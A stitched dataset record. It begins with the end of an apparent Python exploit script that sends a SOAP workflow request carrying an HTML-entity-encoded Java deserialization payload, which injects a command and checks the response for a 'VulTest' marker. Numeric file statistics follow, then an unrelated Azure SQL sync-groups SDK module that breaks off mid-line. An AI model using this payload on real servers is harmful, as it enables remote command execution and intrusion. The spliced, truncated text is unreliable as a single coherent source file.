e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x41;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x53;&#x74;&#x61;&#x74;&#x75;&#x73;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x41;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x53;&#x74;&#x61;&#x74;&#x75;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x67;&#x6e;&#x6f;&#x72;&#x65;&#x64;&#x5f;&#x5f;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x6a;&#x61;&#x76;&#x61;&#x78;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x73;&#x75;&#x6e;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x67;&#x6e;&#x6f;&#x72;&#x65;&#x64;&#x5f;&#x5f;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x72;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x53;&#x79;&#x6e;&#x74;&#x68;&#x65;&#x74;&#x69;&#x63;&#x52;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x74;&#x68;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x2e;&#x3c;&#x2f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x5f;&#x5f;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x64;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x72;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x65;&#x72;&#x54;&#x6f;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x75;&#x6e;&#x2e;&#x6d;&#x69;&#x73;&#x63;&#x2e;&#x4c;&#x61;&#x75;&#x6e;&#x63;&#x68;&#x65;&#x72;&#x24;&#x45;&#x78;&#x74;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x6f;&#x72;&#x43;&#x4c;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x74;&#x79;&#x70;&#x65;&#x3e;&#x4b;&#x45;&#x59;&#x53;&#x3c;&#x2f;&#x74;&#x79;&#x70;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x6e;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x42;&#x79;&#x74;&#x65;&#x41;&#x72;&#x72;&#x61;&#x79;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x62;&#x75;&#x66;&#x3e;&#x3c;&#x2f;&#x62;&#x75;&#x66;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x6f;&#x73;&#x3e;&#x30;&#x3c;&#x2f;&#x70;&#x6f;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6d;&#x61;&#x72;&#x6b;&#x3e;&#x30;&#x3c;&#x2f;&#x6d;&#x61;&#x72;&#x6b;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x30;&#x3c;&#x2f;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6e;&#x73;&#x75;&#x6d;&#x65;&#x64;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x63;&#x6f;&#x6e;&#x73;&#x75;&#x6d;&#x65;&#x64;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x74;&#x72;&#x61;&#x6e;&#x73;&#x66;&#x65;&#x72;&#x46;&#x6c;&#x61;&#x76;&#x6f;&#x72;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x4c;&#x65;&#x6e;&#x3e;&#x30;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x4c;&#x65;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;&#x0a;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;</web:string> <web:string>2</web:string> </web:doCreateWorkflowRequest> </soapenv:Body> </soapenv:Envelope>'''.format(cmd=cmd) try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) r = requests.post(url,headers=headers,data=data,verify=False,timeout=5) if "VulTest" in r.text and r.status_code == 500: result['target'] = target result['poc'] = NAME result['url'] = url return result else: pass except: pass if __name__ == '__main__': target = sys.argv[1] poc(target)
798.703704
41,243
0.502087
7,060
43,130
3.064731
0.023938
0.289227
0.400148
0.490271
0.606692
0.520035
0.502565
0.47844
0.463881
0.449462
0
0.295161
0.008741
43,130
54
41,244
798.703704
0.210933
0.00109
0
0.177778
0
0.066667
0.981746
0.969235
0
0
0
0
0
1
0.022222
false
0.044444
0.066667
0
0.111111
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
1
1
1
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
484f24f337816c4f29b5edd0953b48345f0151ba
47,356
py
Python
src/db-up/azext_db_up/vendored_sdks/azure_mgmt_sql/sql/operations/sync_groups_operations.py
Mannan2812/azure-cli-extensions
e2b34efe23795f6db9c59100534a40f0813c3d95
[ "MIT" ]
207
2017-11-29T06:59:41.000Z
2022-03-31T10:00:53.000Z
src/db-up/azext_db_up/vendored_sdks/azure_mgmt_sql/sql/operations/sync_groups_operations.py
Mannan2812/azure-cli-extensions
e2b34efe23795f6db9c59100534a40f0813c3d95
[ "MIT" ]
4,061
2017-10-27T23:19:56.000Z
2022-03-31T23:18:30.000Z
src/db-up/azext_db_up/vendored_sdks/azure_mgmt_sql/sql/operations/sync_groups_operations.py
Mannan2812/azure-cli-extensions
e2b34efe23795f6db9c59100534a40f0813c3d95
[ "MIT" ]
802
2017-10-11T17:36:26.000Z
2022-03-31T22:24:32.000Z
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- import uuid from msrest.pipeline import ClientRawResponse from msrestazure.azure_exceptions import CloudError from msrest.polling import LROPoller, NoPolling from msrestazure.polling.arm_polling import ARMPolling from .. import models class SyncGroupsOperations(object): """SyncGroupsOperations operations. :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. :ivar api_version: The API version to use for the request. Constant value: "2015-05-01-preview". """ models = models def __init__(self, client, config, serializer, deserializer): self._client = client self._serialize = serializer self._deserialize = deserializer self.api_version = "2015-05-01-preview" self.config = config def list_sync_database_ids( self, location_name, custom_headers=None, raw=False, **operation_config): """Gets a collection of sync database ids. :param location_name: The name of the region where the resource is located. :type location_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: An iterator like instance of SyncDatabaseIdProperties :rtype: ~azure.mgmt.sql.models.SyncDatabaseIdPropertiesPaged[~azure.mgmt.sql.models.SyncDatabaseIdProperties] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ def internal_paging(next_link=None, raw=False): if not next_link: # Construct URL url = self.list_sync_database_ids.metadata['url'] path_format_arguments = { 'locationName': self._serialize.url("location_name", location_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') else: url = next_link query_parameters = {} # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp return response # Deserialize response deserialized = models.SyncDatabaseIdPropertiesPaged(internal_paging, self._deserialize.dependencies) if raw: header_dict = {} client_raw_response = models.SyncDatabaseIdPropertiesPaged(internal_paging, self._deserialize.dependencies, header_dict) return client_raw_response return deserialized list_sync_database_ids.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Sql/locations/{locationName}/syncDatabaseIds'} def _refresh_hub_schema_initial( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): # Construct URL url = self.refresh_hub_schema.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.post(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200, 202]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response def refresh_hub_schema( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, polling=True, **operation_config): """Refreshes a hub database schema. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: The poller return type is ClientRawResponse, the direct response alongside the deserialized response :param polling: True for ARMPolling, False for no polling, or a polling object for personal polling strategy :return: An instance of LROPoller that returns None or ClientRawResponse<None> if raw==True :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ raw_result = self._refresh_hub_schema_initial( resource_group_name=resource_group_name, server_name=server_name, database_name=database_name, sync_group_name=sync_group_name, custom_headers=custom_headers, raw=True, **operation_config ) def get_long_running_output(response): if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response lro_delay = operation_config.get( 'long_running_operation_timeout', self.config.long_running_operation_timeout) if polling is True: polling_method = ARMPolling(lro_delay, **operation_config) elif polling is False: polling_method = NoPolling() else: polling_method = polling return LROPoller(self._client, raw_result, get_long_running_output, polling_method) refresh_hub_schema.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/refreshHubSchema'} def list_hub_schemas( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): """Gets a collection of hub database schemas. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: An iterator like instance of SyncFullSchemaProperties :rtype: ~azure.mgmt.sql.models.SyncFullSchemaPropertiesPaged[~azure.mgmt.sql.models.SyncFullSchemaProperties] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ def internal_paging(next_link=None, raw=False): if not next_link: # Construct URL url = self.list_hub_schemas.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') else: url = next_link query_parameters = {} # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp return response # Deserialize response deserialized = models.SyncFullSchemaPropertiesPaged(internal_paging, self._deserialize.dependencies) if raw: header_dict = {} client_raw_response = models.SyncFullSchemaPropertiesPaged(internal_paging, self._deserialize.dependencies, header_dict) return client_raw_response return deserialized list_hub_schemas.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/hubSchemas'} def list_logs( self, resource_group_name, server_name, database_name, sync_group_name, start_time, end_time, type, continuation_token=None, custom_headers=None, raw=False, **operation_config): """Gets a collection of sync group logs. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param start_time: Get logs generated after this time. :type start_time: str :param end_time: Get logs generated before this time. :type end_time: str :param type: The types of logs to retrieve. Possible values include: 'All', 'Error', 'Warning', 'Success' :type type: str :param continuation_token: The continuation token for this operation. :type continuation_token: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: An iterator like instance of SyncGroupLogProperties :rtype: ~azure.mgmt.sql.models.SyncGroupLogPropertiesPaged[~azure.mgmt.sql.models.SyncGroupLogProperties] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ def internal_paging(next_link=None, raw=False): if not next_link: # Construct URL url = self.list_logs.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['startTime'] = self._serialize.query("start_time", start_time, 'str') query_parameters['endTime'] = self._serialize.query("end_time", end_time, 'str') query_parameters['type'] = self._serialize.query("type", type, 'str') if continuation_token is not None: query_parameters['continuationToken'] = self._serialize.query("continuation_token", continuation_token, 'str') query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') else: url = next_link query_parameters = {} # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp return response # Deserialize response deserialized = models.SyncGroupLogPropertiesPaged(internal_paging, self._deserialize.dependencies) if raw: header_dict = {} client_raw_response = models.SyncGroupLogPropertiesPaged(internal_paging, self._deserialize.dependencies, header_dict) return client_raw_response return deserialized list_logs.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/logs'} def cancel_sync( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): """Cancels a sync group synchronization. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: None or ClientRawResponse if raw=true :rtype: None or ~msrest.pipeline.ClientRawResponse :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ # Construct URL url = self.cancel_sync.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.post(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = 